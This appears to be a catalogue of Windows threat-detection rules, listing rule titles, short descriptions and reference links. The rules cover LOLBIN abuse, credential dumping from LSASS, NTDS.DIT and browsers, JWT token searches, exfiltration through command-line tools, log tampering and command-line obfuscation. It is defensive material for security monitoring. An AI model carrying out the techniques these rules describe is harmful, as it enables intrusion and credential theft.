Arbitrary File Download Via Squirrel.EXE Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
Process Proxy Execution Via Squirrel.EXE Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
Port Forwarding Activity Via SSH.EXE Detects port forwarding activity via SSH.exe https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Program Executed Using Proxy/Local Command Via SSH.EXE Detect usage of the "ssh.exe" binary as a proxy to launch other programs. https://lolbas-project.github.io/lolbas/Binaries/Ssh/, https://github.com/LOLBAS-Project/LOLBAS/pull/211/files, https://gtfobins.github.io/gtfobins/ssh/, https://man.openbsd.org/ssh_config#ProxyCommand, https://man.openbsd.org/ssh_config#LocalCommand
Potential RDP Tunneling Via SSH Execution of ssh.exe to perform data exfiltration and tunneling through RDP https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Potential Amazon SSM Agent Hijacking Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
Execution via stordiag.exe Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html, https://twitter.com/eral4m/status/1451112385041911809
Start of NT Virtual DOS Machine Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support, https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7, https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/, https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/
Abused Debug Privilege by Arbitrary Parent Processes Detection of unusual child processes by different system processes https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg
User Added to Local Administrators Group Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
User Added To Highly Privileged Group Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
User Added to Remote Desktop Users Group Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/
Execute From Alternate Data Streams Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
Always Install Elevated Windows Installer Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg
Potentially Suspicious Windows App Activity Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
Arbitrary Shell Command Execution Via Settingcontent-Ms The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
Phishing Pattern ISO in Archive Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) https://twitter.com/1ZRR4H/status/1534259727059787783, https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/
Automated Collection Command Prompt Once established within a system or network, an adversary may use automated techniques for collecting internal data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
Bad Opsec Defaults Sacrificial Processes With Improper Arguments Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/, https://www.cobaltstrike.com/help-opsec, https://twitter.com/CyberRaiju/status/1251492025678983169, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32, https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool, https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
Potential Suspicious Browser Launch From Document Reader Process Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/, https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/
Potential Browser Data Stealing Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
Suspicious Child Process Created as System Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://github.com/antonioCoco/RogueWinRM, https://twitter.com/Cyb3rWard0g/status/1453123054243024897
Potential Commandline Obfuscation Using Escape Characters Detects potential commandline obfuscation using known escape characters https://twitter.com/vysecurity/status/885545634958385153, https://twitter.com/Hexacorn/status/885553465417756673, https://twitter.com/Hexacorn/status/885570278637678592, https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques, https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http
Potential Command Line Path Traversal Evasion Attempt Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline https://twitter.com/hexacorn/status/1448037865435320323, https://twitter.com/Gal_B1t/status/1062971006078345217
Suspicious Copy From or To System Directory Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
Copy From Or To Admin Share Or Sysvol Folder Detects a copy command or a copy utility execution to or from an Admin share or remote https://twitter.com/SBousseaden/status/1211636381086339073, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
Potential Crypto Mining Activity Detects command line parameters or strings often used by crypto miners https://www.poolwatch.io/coin/monero
LOL-Binary Copied From System Directory Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
Potential Data Exfiltration Activity Via CommandLine Tools Detects the use of various CLI utilities exfiltrating data via web requests https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
Raccine Uninstall Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. https://github.com/Neo23x0/Raccine
Suspicious Double Extension File Execution Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html, https://twitter.com/blackorbird/status/1140519090961825792
Suspicious Parent Double Extension File Execution Detect execution of suspicious double extension files in ParentCommandLine https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa
Suspicious Download from Office Domain Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents https://twitter.com/an0n_r0/status/1474698356635193346?s=12, https://twitter.com/mrd0x/status/1475085452784844803?s=12
DumpStack.log Defender Evasion Detects the use of the filename DumpStack.log to evade Microsoft Defender https://twitter.com/mrd0x/status/1479094189048713219
Always Install Elevated MSI Spawned Cmd And Powershell Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg
Suspicious Electron Application Child Processes Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) https://taggart-tech.com/quasar-electron/, https://github.com/mttaggart/quasar, https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
Potentially Suspicious Electron Application CommandLine Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf, https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc
Elevated System Shell Spawned From Uncommon Parent Location Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location. https://github.com/Wh04m1001/SysmonEoP
Hidden Powershell in Link File Pattern Detects events that appear when a user click on a link file with a powershell command in it https://www.x86matthew.com/view_post?id=embed_exe_lnk
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
ETW Logging Tamper In .NET Processes Via CommandLine Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
ETW Trace Evasion Activity Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://abuse.io/lockergoga.txt, https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
Suspicious Eventlog Clearing or Configuration Change Activity Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee, https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://www.group-ib.com/blog/apt41-world-tour-2021/, https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
Potentially Suspicious Execution From Parent Process In Public Folder Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines. https://redcanary.com/blog/blackbyte-ransomware/
Process Execution From A Potentially Suspicious Folder Detects a potentially suspicious execution from an uncommon folder. https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt, https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses, https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/, https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
Suspicious File Characteristics Due to Missing Fields Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe https://securelist.com/muddywater/88059/, https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
Writing Of Malicious Files To The Fonts Folder Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/
Potential Homoglyph Attack Using Lookalike Characters Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php
Execution Of Non-Existing File Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) https://pentestlaboratories.com/2021/12/08/process-ghosting/
Base64 MZ Header In CommandLine Detects encoded base64 MZ header in the commandline https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Potential WinAPI Calls Via CommandLine Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec https://twitter.com/m417z/status/1566674631788007425
Potentially Suspicious JWT Token Search Via CLI Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps. https://mrd0x.com/stealing-tokens-from-office-applications/
Local Accounts Discovery Local accounts, System Owner/User discovery using operating systems utilities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md
LOLBIN Execution From Abnormal Drive Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://www.scythe.io/library/threat-emulation-qakbot, https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/
LSASS Dump Keyword In CommandLine Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. https://github.com/Hackndo/lsassy, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump
Potential File Download Via MS-AppInstaller Protocol Handler Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
Suspicious Network Command Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows
Suspicious Scan Loop Network Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://ss64.com/nt/for.html, https://ss64.com/ps/foreach-object.html
Potential Network Sniffing Activity Using Network Tools Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
Execution of Suspicious File Type Extension Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment. https://pentestlaboratories.com/2021/12/08/process-ghosting/
Non-privileged Usage of Reg or Powershell Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg
Process Launched Without Image Name Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Suspicious Process Patterns NTDS.DIT Exfil Detects suspicious process patterns used in NTDS.DIT exfiltration https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1, https://github.com/zcgonvh/NTDSDumpEx, https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1, https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
Potentially Suspicious Call To Win32_NTEventlogFile Class Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)
Use Short Name Path in Command Line Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232
Use Short Name Path in Image Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232
Use NTFS Short Name in Command Line Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984
Use NTFS Short Name in Image Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984
Obfuscated IP Download Activity Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608, https://twitter.com/fr0s7_/status/1712780207105404948
Obfuscated IP Via CLI Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
Suspicious Process Parents Detects suspicious parent processes that should not have any children or should only have a single possible child program https://twitter.com/x86matthew/status/1505476263464607744?s=12, https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b
Private Keys Reconnaissance Via CommandLine Tools Adversaries may search for private key certificate files on compromised systems for insecurely stored credential https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md
Potential PowerShell Execution Via DLL Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine. https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md
Suspicious RunAs-Like Flag Combination Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html
Privilege Escalation via Named Pipe Impersonation Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html
Windows Processes Suspicious Parent Directory Detect suspicious parent processes of well-known Windows processes https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2, https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/, https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf
Suspicious Program Names Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
Recon Information for Export with Command Prompt Once established within a system or network, an adversary may use automated techniques for collecting internal data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
Suspicious Process Execution From Fake Recycle.Bin Folder Detects process execution from a fake recycle bin folder, often used to avoid security solution. https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
Suspicious Redirection to Local Admin Share Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Potential Remote Desktop Tunneling Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html
Potential Defense Evasion Via Right-to-Left Override Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques. https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method, https://unicode-explorer.com/c/202E
Script Interpreter Execution From Suspicious Folder Detects a suspicious script execution in temporary folders or folders accessible by environment variables https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military, https://learn.microsoft.com/en-us/windows/win32/shell/csidl
Suspicious Script Execution From Temp Folder Detects a suspicious script executions from temporary folder https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
Sensitive File Access Via Volume Shadow Copy Backup Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit) https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
